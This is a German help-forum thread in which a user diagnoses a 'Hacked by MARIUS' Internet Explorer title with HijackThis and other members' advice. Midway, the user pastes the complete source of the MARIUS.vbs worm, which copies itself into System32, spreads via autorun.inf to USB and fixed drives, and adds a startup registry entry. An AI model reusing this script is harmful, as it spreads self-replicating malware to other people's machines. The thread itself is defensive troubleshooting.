Viren, Spyware, Datenschutz 11.259 Themen, 94.815 Beiträge

I-Net Explorer --- Hacked by (COMPUTERNAME)

DSL - Freak / 38 Antworten / Baumansicht Nickles

Hallo Leute ich habe mal wieder ein Problem.
In der Titelleiste von meinem Internet Explorer steht auf allen Seiten auf die ich gehe immer hinter dem Seiten namen Hacked by (COMPUTERNAME)
Also hier steht zum Beispiel: Nickles.de -Neue Diskussion - Hacked by MARIUS.
So Ich habe auch schon geguckt im Internet und viele haben dieses Problem. Es wird beschrieben, dass es ein Trojaner ist und dass ein Virenscanner ihn nicht findet.
Ich war gestern auf einer Lan Party und von da her könnte das gut sein =( :'(

Ich habe die Anleitungen zum beseitigen in den anderen Foren nicht verstanden.
Ich weiß nur soweit, dass ich ein Hijackythis Logfile posten muss.
Da ich kein Forum gefunden habe dem mein Logfile zumindest annähernd ähnlich st, möchte ich es hier noch einmal posten.
Die Automatische Untersuchung von Hikacky this findet nicht ungewöhnliches.
Ich habe shcon gelesen, dass man de Computer eventuell neu machen sollte.
Ich habe nur dass Problem, dass ich archivierte Musik und Dokumente gerne behalten möchte und dass sich der Virus doch später, wenn ich diese wieder auf die Festplatte spiele, automatisch wieder überträgt.
Dann habe ich noch eine Frage bezüglich der verbreitbarkeit des Virusses. An unserem Heimnetzwerk am Router ist noch ein anderer COmputer angeschlossen, kann sich dieser mit dem Virus infiziern?

Hier erstmal das Hijacky this Logfile:


Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 16:10:07, on 14.06.2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Programme\Avira\AntiVir PersonalEdition Classic\avguard.exe
C:\Programme\Avira\AntiVir PersonalEdition Classic\sched.exe
C:\Programme\Gemeinsame Dateien\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Programme\CPUCooL\CooLSrv.exe
C:\Programme\DU Meter\DUMeterSvc.exe
C:\Programme\Intel\Intel Matrix Storage Manager\Iaantmon.exe
C:\Programme\Gemeinsame Dateien\NMSAccessU.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\PnkBstrA.exe
C:\Programme\CyberLink\Shared files\RichVideo.exe
C:\Programme\802.11 Wireless LAN\802.11g Pen Size Wireless USB 2.0 Adapter HW.32 V1.10\SiSWLSvc.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\Programme\Intel\Intel Matrix Storage Manager\Iaanotif.exe
C:\Programme\Avira\AntiVir PersonalEdition Classic\avgnt.exe
C:\Programme\Logitech\G-series Software\LGDCore.exe
C:\Programme\Logitech\G-series Software\LCDMon.exe
C:\Programme\iTunes\iTunesHelper.exe
C:\Programme\Philips\PSA2\skin\QveCplSk.EXE
C:\Programme\Gemeinsame Dateien\TerraTec\Remote\TTTvRc.exe
C:\WINDOWS\System32\WScript.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Programme\POP Peeper\POPPeeper.exe
C:\Programme\Windows Live\Messenger\msnmsgr.exe
C:\Programme\Logitech\Desktop Messenger\8876480\Program\LogitechDesktopMessenger.exe
C:\Programme\Logitech\SetPoint\SetPoint.exe
C:\Programme\Logitech\G-series Software\Applets\LCDPop3\LCDPOP3.exe
C:\Programme\Logitech\G-series Software\Applets\LCDMedia.exe
C:\Programme\Logitech\G-series Software\Applets\LCDClock.exe
C:\Programme\802.11 Wireless LAN\802.11g Pen Size Wireless USB 2.0 Adapter HW.32 V1.10\WlanCU.exe
C:\Programme\Gemeinsame Dateien\Logishrd\KHAL2\KHALMNPR.EXE
C:\Programme\iPod\bin\iPodService.exe
C:\Programme\Gemeinsame Dateien\Teleca Shared\Generic.exe
C:\Programme\Sony Ericsson\Mobile2\Mobile Phone Monitor\epmworker.exe
C:\Programme\Gemeinsame Dateien\Microsoft Shared\Windows Live\WLLoginProxy.exe
C:\Programme\Internet Explorer\iexplore.exe
C:\Programme\Internet Explorer\iexplore.exe
C:\Programme\Trend Micro\HijackThis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.de/
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Hacked by MARIUS
O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - (no file)
O2 - BHO: Adobe PDF Reader - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programme\Gemeinsame Dateien\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Windows Live Anmelde-Hilfsprogramm - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Programme\Gemeinsame Dateien\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O3 - Toolbar: &TerraTec Home Cinema - {AD6E6555-FB2C-47D4-8339-3E2965509877} - C:\PROGRA~1\TerraTec\TERRAT~1\THCDES~1.DLL
O4 - HKLM\..\Run: [IAAnotif] "C:\Programme\Intel\Intel Matrix Storage Manager\Iaanotif.exe"
O4 - HKLM\..\Run: [JMB36X IDE Setup] C:\WINDOWS\RaidTool\xInsIDE.exe
O4 - HKLM\..\Run: [36X Raid Configurer] C:\WINDOWS\system32\xRaidSetup.exe boot
O4 - HKLM\..\Run: [avgnt] "C:\Programme\Avira\AntiVir PersonalEdition Classic\avgnt.exe" /min
O4 - HKLM\..\Run: [Launch LGDCore] "C:\Programme\Logitech\G-series Software\LGDCore.exe" /SHOWHIDE
O4 - HKLM\..\Run: [Launch LCDMon] "C:\Programme\Logitech\G-series Software\LCDMon.exe"
O4 - HKLM\..\Run: [Kernel and Hardware Abstraction Layer] KHALMNPR.EXE
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [QuickTime Task] "C:\Programme\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [iTunesHelper] "C:\Programme\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [NBKeyScan] "C:\Programme\Nero\Nero8\Nero BackItUp\NBKeyScan.exe"
O4 - HKLM\..\Run: [QveCtl2Tray] C:\Programme\Philips\PSA2\skin\QveCplSk.EXE C:\Programme\Philips\PSA2\skin
O4 - HKLM\..\Run: [TerraTec Remote Control] "C:\Programme\Gemeinsame Dateien\TerraTec\Remote\TTTvRc.exe"
O4 - HKLM\..\Run: [MARIUS] C:\WINDOWS\SYSTEM32\MARIUS.vbs
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [POP Peeper] "C:\Programme\POP Peeper\POPPeeper.exe" -min
O4 - HKCU\..\Run: [DU Meter] C:\Programme\DU Meter\DUMeter.exe
O4 - HKCU\..\Run: [msnmsgr] "C:\Programme\Windows Live\Messenger\msnmsgr.exe" /background
O4 - HKCU\..\Run: [IndxStoreSvr_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Programme\Gemeinsame Dateien\Nero\Lib\NMIndexStoreSvr.exe" ASO-616B5711-6DAE-4795-A05F-39A1E5104020
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'LOKALER DIENST')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'NETZWERKDIENST')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - Global Startup: Logitech Desktop Messenger.lnk = C:\Programme\Logitech\Desktop Messenger\8876480\Program\LogitechDesktopMessenger.exe
O4 - Global Startup: Logitech SetPoint.lnk = C:\Programme\Logitech\SetPoint\SetPoint.exe
O4 - Global Startup: Wireless Configuration Utility HW.32.lnk = ?
O9 - Extra button: ICQ Lite - {B863453A-26C3-4e1f-A54D-A2CD196348E9} - C:\Programme\ICQLite\ICQLite.exe
O9 - Extra 'Tools' menuitem: ICQ Lite - {B863453A-26C3-4e1f-A54D-A2CD196348E9} - C:\Programme\ICQLite\ICQLite.exe
O9 - Extra button: ICQ6 - {E59EB121-F339-4851-A3BA-FE49C35617C2} - C:\Programme\ICQ\ICQ6\ICQ.exe
O9 - Extra 'Tools' menuitem: ICQ6 - {E59EB121-F339-4851-A3BA-FE49C35617C2} - C:\Programme\ICQ\ICQ6\ICQ.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programme\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programme\Messenger\msmsgs.exe
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204
O16 - DPF: {BA162249-F2C5-4851-8ADC-FC58CB424243} (Image Uploader Control) - http://static.ak.schuelervz.net/photouploader/ImageUploader5.cab?nocache=20080115-1
O18 - Protocol: bwfile-8876480 - {9462A756-7B47-47BC-8C80-C34B9B80B32B} - C:\Programme\Logitech\Desktop Messenger\8876480\Program\GAPlugProtocol-8876480.dll
O23 - Service: AntiVir PersonalEdition Classic Planer (AntiVirScheduler) - Avira GmbH - C:\Programme\Avira\AntiVir PersonalEdition Classic\sched.exe
O23 - Service: AntiVir PersonalEdition Classic Guard (AntiVirService) - Avira GmbH - C:\Programme\Avira\AntiVir PersonalEdition Classic\avguard.exe
O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Programme\Gemeinsame Dateien\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: ASP.NET State Service (aspnet_state) - Unknown owner - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe (file missing)
O23 - Service: CPUCooLServer Service (CPUCooLServer) - Unknown owner - C:\Programme\CPUCooL\CooLSrv.exe
O23 - Service: DU Meter Service (DUMeterSvc) - Hagel Technologies Ltd - C:\Programme\DU Meter\DUMeterSvc.exe
O23 - Service: Intel(R) Matrix Storage Event Monitor (IAANTMON) - Intel Corporation - C:\Programme\Intel\Intel Matrix Storage Manager\Iaantmon.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Programme\Gemeinsame Dateien\InstallShield\Driver\1150\Intel 32\IDriverT.exe
O23 - Service: iPod-Dienst (iPod Service) - Apple Inc. - C:\Programme\iPod\bin\iPodService.exe
O23 - Service: Logitech Bluetooth Service (LBTServ) - Logitech, Inc. - C:\Programme\Gemeinsame Dateien\Logitech\Bluetooth\LBTServ.exe
O23 - Service: MSCSPTISRV - Sony Corporation - C:\Programme\Gemeinsame Dateien\Sony Shared\AVLib\MSCSPTISRV.exe
O23 - Service: NMSAccessU - Unknown owner - C:\Programme\Gemeinsame Dateien\NMSAccessU.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: PACSPTISVR - Unknown owner - C:\Programme\Gemeinsame Dateien\Sony Shared\AVLib\PACSPTISVR.exe
O23 - Service: PnkBstrA - Unknown owner - C:\WINDOWS\system32\PnkBstrA.exe
O23 - Service: Cyberlink RichVideo Service(CRVS) (RichVideo) - Unknown owner - C:\Programme\CyberLink\Shared files\RichVideo.exe
O23 - Service: SiS WirelessLan Service (SiSWLSvc) - Unknown owner - C:\Programme\802.11 Wireless LAN\802.11g Pen Size Wireless USB 2.0 Adapter HW.32 V1.10\SiSWLSvc.exe
O23 - Service: SonicStage Back-End Service - Sony Corporation - C:\Programme\Gemeinsame Dateien\Sony Shared\AVLib\SsBeSvc.exe
O23 - Service: Sony SPTI Service (SPTISRV) - Sony Corporation - C:\Programme\Gemeinsame Dateien\Sony Shared\AVLib\SPTISRV.exe
O23 - Service: SonicStage SCSI Service (SSScsiSV) - Sony Corporation - C:\Programme\Gemeinsame Dateien\Sony Shared\AVLib\SSScsiSV.exe

--
End of file - 9317 bytes







Ich danke euch jetzt shcon mal für eutre Hilfe, wünsche euch einen schönen Sonntag und hoffe auf eine möglichst detaillreiche Erklärung ;)

Dankeschöööön...

DSL-Freak

bei Antwort benachrichtigen
Max Payne DSL - Freak „I-Net Explorer --- Hacked by (COMPUTERNAME)“
Optionen

Guck Dir das mal genauer an:
C:\WINDOWS\SYSTEM32\MARIUS.vbs

The trouble with computers is that they do what you told them – not necessarily what you wanted them to do.
bei Antwort benachrichtigen
shrek3 DSL - Freak „I-Net Explorer --- Hacked by (COMPUTERNAME)“
Optionen

Hallo DSL-Freak,

in deinem Hijack-Logfile gibt es zwei Einträge, die mit einem gelben Fragezeichen versehen sind:

O4 - HKLM\..\Run: [MARIUS] C:\WINDOWS\SYSTEM32\MARIUS.vbs
O16 - DPF: {BA162249-F2C5-4851-8ADC-FC58CB424243} (Image Uploader Control) - http://static.ak.schuelervz.ne ...

Diese Datei löst die Meldung (Hacked by Marius) aus und wird bei jedem Neustart von Windows automatisch aufgerufen:
marius.vbs

Evtl. lässt sich das Problem durch simples Löschen der vbs-Datei beheben.
Nehme dann noch über Start -> Ausführen -> msconfig -> OK -> Registerkarte "Systemstart" den Haken raus, der zu dieser Datei gehört.

Gut möglich, dass sich einer namens Marius auf der LAN-Party lediglich einen Scherz erlaubt hat.
Doch sollte das Problem dadurch nicht beseitigt werden können, ist es ernsterer Natur.

Wie es mit der Verbreitung dieses Scriptes in deinem privaten Netz aussieht, hängt u.a. auch davon ab, ob du mit deinen Computern überhaupt Dateien austauschst.

Gruß
Shrek3

Fatal ist mir um das Lumpenpack, das, um Herzen zu rühren, den Patriotismus trägt zur Schau, mit all seinen Geschwüren. Heinrich Heine
bei Antwort benachrichtigen
DSL - Freak shrek3 „Hallo DSL-Freak, in deinem Hijack-Logfile gibt es zwei Einträge, die mit einem...“
Optionen

Wie soll ich mir das denn genauer angucken?

ich kann die datei nicht löschen, weil es sie nicht gibt...
ich gucke in den ordner und da is keine datei drin die MARIUS.vbs heißt...
einen haken dafür gibt es auch nicht...

ne das sind alles keine computer profis.. die hätten das auf keinen fall hinbekommen...
auch wenn man vielleicht nicht viel dafür wissen muss, hätten die das nicht hinbekommen...

das komische daran ist, dass ich mit einem doppelklick nicht auf die laufwerke zugreifen kann...
diese tatsache steht auch als nachweismittel für einen virus in den anderen foren.

zu der verbreitung...

wir senden datein im netzwerk und benutzen den selben drucker...

heißt das, dass jetzt alle, die gestern auf der lan party waren den virus ahben?
Ist der virus falls es einer ist in allen meienn dateien oder nur im windows system?

Wie kann ich diese datein löschen ohen dass sie vorhanden sind ;) ?!

Oder was kann ich sonst noc tun?

Liebe Grüße..
DSL - Freak

bei Antwort benachrichtigen
DSL - Freak Nachtrag zu: „Wie soll ich mir das denn genauer angucken? ich kann die datei nicht löschen,...“
Optionen

also den eintrag (wo ich den hakena mchen muss) habe ich jetzt doch gefunde.. da nehm ich den haken mal raus.. aber selbstw enn es danahc nicht mehr ind er inet explorer leiste steht, habe ich angst dass es ein trojaner ist/ war und dass daten von mir ausspioniert werden könnten... wie kann sich so ein eintrag denn einfach so festsetzten??

Wodurch ensteht so etwas??

Oder wie kann ich das Iendeutig überprüfen?

Liebe Grüße

bei Antwort benachrichtigen
DSL - Freak Nachtrag zu: „also den eintrag wo ich den hakena mchen muss habe ich jetzt doch gefunde.. da...“
Optionen

Hey ich habe einige Seiten gefunden.
meint ihr dies ist das selbe Problem?


http://files.filefront.com/KillGodzillaexe/;6645030;/fileinfo.html
http://www.informatikboard.ch/windows-software-allgemein/14573-internet-explorer-hacked-godzilla.html
http://blog.sofasurfer.ch/DasBlog/2007/03/09/Hacked+By+Godzilla+Ms32dlldllvbs.aspx

weil die datein die ich da löschen soll finde ich nicht...

ich hoffe ihr habt noch nen paar tolle ideen

bei Antwort benachrichtigen
shrek3 DSL - Freak „Hey ich habe einige Seiten gefunden. meint ihr dies ist das selbe Problem?...“
Optionen

Öffne einen beliebigen Ordner -> Extras -> Ordneroptionen -> Registerkarte "Ansicht".

Dort Haken raus:
Erweiterungen bei bekannten Dateitypen ausblenden
Geschützte Systemdateien ausblenden

Haken rein:
Inhalte von Systemordnern anzeigen
Alle Dateien und Ordner anzeigen

Normalerweise müsstest du nun die Dateien im Ordner Windows\System32 sehen können.

Falls nicht, böte zwar der abgesicherte Modus noch eine Chance, diese Datei von Hand zu löschen (F8 drücken, bevor Windows hochfährt).
Da ich das Wirken dieser Datei jedoch nicht kenne, kann ich dir diesen Hinweis nicht wirklich empfehlen.

Starte den PC mal neu und schaue, ob der Haken bei der Marius.vbs immer noch entfernt ist oder nicht.
(Start -> Ausführen -> msconfig....)

Um das System neu aufzusetzen, greife auf diese Anleitung zurück:
http://www.juekirs.de/Dateien/Installation_von_WindowsXP.pdf

Musik, Filme und Dokument zuvor auf eine andere Partition, Festplatte, CD usw.sichern.
Desgleichen Mails und Emailkontoeinstellungen.

Wenn du Fragen zur Sicherung hast, stelle sie, bevor du evtl. neu aufsetzt.

Zur Überprüfung deines PCs klicke mal hier drauf und suche dir einen oder mehrere Links aus:
http://www.nickles.de/v3/php_jobs/glossar.php3?id=1029

Gruß
Shrek3

Fatal ist mir um das Lumpenpack, das, um Herzen zu rühren, den Patriotismus trägt zur Schau, mit all seinen Geschwüren. Heinrich Heine
bei Antwort benachrichtigen
Max Payne shrek3 „Öffne einen beliebigen Ordner - Extras - Ordneroptionen - Registerkarte Ansicht...“
Optionen

Öffne mal die Datei Marius.vbs mit dem Notepad und poste den Inhalt hier, dann können wir Dir evtl. sagen, wie gefährlich dieses Skript tatsächlich ist.

The trouble with computers is that they do what you told them – not necessarily what you wanted them to do.
bei Antwort benachrichtigen
gelöscht_23570 DSL - Freak „I-Net Explorer --- Hacked by (COMPUTERNAME)“
Optionen

Der Titeltext ist in der Registry verewigt und kann auch von Hand verändert werden.

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Hacked by MARIUS

Wenn dieses VBS-Script von Marius sonst nichts weiter anstellt, kannst Du das einfach wieder auf einen Text Deiner Wahl ändern (z. B. mit REGEDIT, TuneUp Utilities).

Das löschen alleine der Datei bzw. dessen Aufruf wird diese Meldung nicht beseitigen, was aber auch nicht mehr als ein Schönheitsfehler wäre.


Gruß Alois


bei Antwort benachrichtigen
DSL - Freak gelöscht_23570 „Der Titeltext ist in der Registry verewigt und kann auch von Hand verändert...“
Optionen

'Mutation of Trojan virus.
'My name is MARIUS.vbs
On error resume next
Dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd,oldname,newname,rgname
Set fs = createobject("Scripting.FileSystemObject")
Set wn = WScript.CreateObject("WScript.Network")
Set mf = fs.getfile(Wscript.ScriptFullname)
oldname=CStr(fs.getfilename(Wscript.ScriptFullname))
newname = wn.ComputerName & ".vbs"
rgname = Replace(newname,".vbs","")
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MARIUS.vbs"
dim text,size
size = mf.size
check = mf.drive.drivetype
Set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
Loop
mysource=Replace(mysource,oldname,newname)
do
Set winpath = fs.getspecialfolder(0)
Set tf = fs.getfile(winpath & "\SYSTEM32\" & newname)
tf.attributes = 32
Set tf=fs.createtextfile(winpath & "\SYSTEM32\" & newname,2,true)
tf.write mysource
tf.close
Set tf = fs.getfile(winpath & "\SYSTEM32\" & newname)
tf.attributes = 39
For each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path "A:" Then
Set tf=fs.getfile(flashdrive.path &"\MARIUS.vbs")
tf.attributes =32
Set tf=fs.createtextfile(flashdrive.path &"\MARIUS.vbs",2,true)
tf.write mysource
tf.close
Set tf=fs.getfile(flashdrive.path &"\MARIUS.vbs")
tf.attributes =39
Set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
Set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
Set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
End If
next
Set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & rgname & "",winpath&"\SYSTEM32\" & newname
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by " & Replace(oldname, ".vbs","")
if check 1 then
Wscript.sleep 120000
End if
loop while check1
Set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname





so das ist das vbs script.
so ein bisschen verstehe ichja, nämlich dass er eben den namen vom internet explorer ändert..
aber inwiefer ist dies nun ein trojaner, der meine passwörter etc. irgendwohin übermittelt?

danke shconmal für eure antowrten udn ich hoffe ihrhabt vielleicht auch an einem sonntag lust und natürlich auch Zeit fließig zu schrieben ;)

Liebe Grüße
DSL - Freak

bei Antwort benachrichtigen
DSL - Freak Nachtrag zu: „ Mutation of Trojan virus. My name is MARIUS.vbs On error resume next Dim...“
Optionen

Als Virenscanner habe ich bereits Avira Antivir.
Ist der nicht gut?

Liebe Grüße...
DSL - Freak

bei Antwort benachrichtigen
DSL - Freak Nachtrag zu: „Als Virenscanner habe ich bereits Avira Antivir. Ist der nicht gut? Liebe...“
Optionen

Ich habe gerade die anleitung zu Installation gelesen..
Ist es wirklich so, dass man den Computer mit einem Image des Betrteibssystems ohne neu zu formatieren wieder in den Betriebszustand zurücksetzten kann?
Und dann noch eine Frage...
Kann man die Programme so installieren, dass man sie anchdem man Windows in einer SEPERATEn Formation installiert hat nicht noch einmal installieren muss?

Die jetzt nur mal als zwischenfrage. Mein eigentliches Problem ist natürlich imemr noch der "Virus"...

Liebe Grüße

DSL - Freak

bei Antwort benachrichtigen
DSL - Freak Nachtrag zu: „Ich habe gerade die anleitung zu Installation gelesen.. Ist es wirklich so, dass...“
Optionen

also der online scan von kaspersky findet als infizierte datei die datei: MARIUS.vbs....
Aber bei ihm gibt es keien option diese zu löschen...
Ich werde jetzt einmal den ordner system 32 mit antivr überprüfen...
Liebe Grüße

bei Antwort benachrichtigen
shrek3 DSL - Freak „also der online scan von kaspersky findet als infizierte datei die datei:...“
Optionen
Ist es wirklich so, dass man den Computer mit einem Image des Betrteibssystems ohne neu zu formatieren wieder in den Betriebszustand zurücksetzten kann?

Ja.
Das setzt aber voraus, dass man das Image erstellt hat, bevor der Computer infiziert wurde.

Geeignete Software: Acronis True Image.
Falls du Festplatten von Seagate und/oder Maxtor verwendest, kannst du die kostenlose Version dieses Programms verwenden.
Download hier: http://www.pcwelt.de/downloads/tools_utilities/system-utilities/101890/discwizard/

Kann man die Programme so installieren, dass man sie nachdem man Windows in einer SEPERATEn Formation installiert hat nicht noch einmal installieren muss?

Nein, das geht nicht. Die meisten Programme installieren ihre Dateien teilweise auch in den Windows-Ordner, tragen sich in die Registry ein, usw.

Zu deiner Frage nach AntiVir.
AntiVir ist schon okay. Aber es gibt es kein Virenschutzprogramm, welches alles erkennt.

Warum löschst du nicht die Marius.vbs, sondern belässt sie im Ordner ../System32???
Hast du außerdem nachgeschaut, ob der Haken (Start -> Ausführen -> msconfig -> Registerkarte "Systemstart") nach einem PC-Neustart sich wieder "wie von Geisterhand" aktiviert hat?

Gruß
Shrek3
Fatal ist mir um das Lumpenpack, das, um Herzen zu rühren, den Patriotismus trägt zur Schau, mit all seinen Geschwüren. Heinrich Heine
bei Antwort benachrichtigen
DSL - Freak shrek3 „ Ja. Das setzt aber voraus, dass man das Image erstellt hat, bevor der Computer...“
Optionen

weil ich sicher stellen möchte, dass mein pc nicht offen wie ein scheunentor ist und ich das, nur weil ich diese datei gelöscht habe nur nicht mehr sehe...
der haken vor der datei ist auch nach systemneustart noch weg.
wie kann ich denn herausfinden, ob der "virus" mehr macht, als nur den namen im inet explorer zu verändern?

Lieb grüße...
DSL - Freak

bei Antwort benachrichtigen
GarfTermy DSL - Freak „weil ich sicher stellen möchte, dass mein pc nicht offen wie ein scheunentor...“
Optionen

wenn du erhebliche zweifel an der vertrauenswürdigkeit deines rrechners hast - dann sichere deine daten, formatiere die systempladde und installiere von originaldatenträgern neu.

;-)

The two basic principles of Windows system administration: For minor problems, reboot For major problems, reinstall
bei Antwort benachrichtigen
DSL - Freak GarfTermy „wenn du erhebliche zweifel an der vertrauenswürdigkeit deines rrechners hast -...“
Optionen

ja.. okay.. nur wie ist das denn mit dem virus?
wenn ich jetzt alle daten sichere, habe ich den virus dann nciht anch der neuinstallaton sofort wieder drauf??
Liebe grüße

bei Antwort benachrichtigen
DSL - Freak Nachtrag zu: „ja.. okay.. nur wie ist das denn mit dem virus? wenn ich jetzt alle daten...“
Optionen

vor allen dingen dieses wscript.exe was im taskmanager 4 mal drin ist ( ich habe jetzte alle beendet) macht mir angst..
googl sagt nämlich, dass dies ein tool ist um informationen zu bescaffen..
stimtm das?
udn wie bekomm ich das weg?
in der signatur des MARIUS.vbs-Skriptes sthet, soweit ich das verstehe drin, dass der das immer wieder erstellt... ist das dann durch simples löschen der datei komplett weg?
und wie bekomme ich heraus, wo dieser virus sichs chon überall verbreitet hat?
Liebe Grüße...

bei Antwort benachrichtigen
shrek3 DSL - Freak „vor allen dingen dieses wscript.exe was im taskmanager 4 mal drin ist ich habe...“
Optionen

Suche mal über die Dateisuche nach der "wscript.exe".

Start -> Suchen -> Dateien und Ordner.
Dort im Texteingabefeld den Dateinamen eingeben und auf "Weitere Optionen" klicken, um Haken in diese Optionen zu setzen:
Systemordner durchsuchen
Versteckte Elemente...
Unterordner...

Es werden wahrscheinlich mehrere Suchergebnisse in der rechten Fensterhälfte aufgelistet werden.
Auf jedes einzelne Suchergebnis mache dieses:
Rechtsklick -> Eigenschaften -> Registerkarte "Version".
Dort kannst du Infos über den Hersteller der Wscript.exe abrufen.

Ist der Hersteller Microsoft, ist diese Datei in Ordnung.

Gruß
Shrek3

Fatal ist mir um das Lumpenpack, das, um Herzen zu rühren, den Patriotismus trägt zur Schau, mit all seinen Geschwüren. Heinrich Heine
bei Antwort benachrichtigen
shrek3 DSL - Freak „ja.. okay.. nur wie ist das denn mit dem virus? wenn ich jetzt alle daten...“
Optionen

Ich habe schon so manchen infizierten Kunden-PC neu aufgesetzt, nachdem ich zuvor die Daten gesichert hatte.
Bisher habe ich es nicht erlebt, dass der Computer anschließend wieder infiziert war.

Was ich sicherheitshalber aber nach einer Neuinstallation immer gemacht habe:
Virenschutzprogramm installiert und damit die Partition überprüft, auf der ich die Daten gesichert hatte.

Schädlinge wollen "ausgeführt" werden - erst dann können sie ihre Aktivitäten entfalten.

"Ausführen" heißt:
Wenn du z.B. einen virenverseuchten Email-Anhang erhalten hast, musst du erst diesen Anhang öffnen.
Tust du das nicht, kannst du theoretisch alle verseuchten Mail-Anhänge der Welt sammeln.
Sie liegen dann nur "schlafend" auf deiner Platte.

Es ist ähnlich wie mit einem installierbaren Programm.
Solange du nicht die Setup.exe ausführst, installiert es sich nicht...

Gruß
Shrek3

Fatal ist mir um das Lumpenpack, das, um Herzen zu rühren, den Patriotismus trägt zur Schau, mit all seinen Geschwüren. Heinrich Heine
bei Antwort benachrichtigen
Max Payne DSL - Freak „ja.. okay.. nur wie ist das denn mit dem virus? wenn ich jetzt alle daten...“
Optionen
wenn ich jetzt alle daten sichere, habe ich den virus dann nciht anch der neuinstallaton sofort wieder drauf??

Mit Daten sind hier Word-, Excel-, Powerpoint-Dateien und ähnliches gemeint. Ebenso eMails und Browser-Bookmarks. Diese Dinge sind im Normalfall unkritisch.
Wenn Du allerdings nach der Neuinstallation wieder wahllos sämtliche gesicherten Systemdateien draufbügelst, kannst Du Dir die Aktion gleich sparen... :-)
The trouble with computers is that they do what you told them – not necessarily what you wanted them to do.
bei Antwort benachrichtigen
DSL - Freak Max Payne „ Mit Daten sind hier Word-, Excel-, Powerpoint-Dateien und ähnliches gemeint....“
Optionen

nein.. aber es geht um spiele, filme, musik und sowas...
versteh einer von euch den inhalt dieses virusses genauer?

Wennich jetzt die datei lösche, heißt das dann das der virus, solange ich ihn nciht ausführe nicht wieder komtm oder heißt das, dass ich nur die sichtbaren anzwichen gelöscht ahe udn der im hintergrund shcön weiter arbeitet?

Das problem ist, dass ich auf der lan party nur filme musik und minispiele gezogen habe...
kann es sein, dass dieser virus in einem der spiele verpackt ist udn jedesmal wenn ich das spiel starte wieder installaiert werden würde??

Liebe Grüße..
DSL - Freak

bei Antwort benachrichtigen
DSL - Freak Nachtrag zu: „nein.. aber es geht um spiele, filme, musik und sowas... versteh einer von euch...“
Optionen

mit dem kaspersky scan finde ich den virus...
wenn ich jetzt versuche ihn zu löschen, dann reboote udn dann erneut scanne und ihn dann nciht mehr finde, heißt das dann dass er komplett weg ist und keinen schadenmehr anrichten kann?
Liebe Grüße

bei Antwort benachrichtigen
shrek3 DSL - Freak „nein.. aber es geht um spiele, filme, musik und sowas... versteh einer von euch...“
Optionen
kann es sein, dass dieser virus in einem der spiele verpackt ist udn jedesmal wenn ich das spiel starte wieder installaiert werden würde??
Das ist gut möglich.

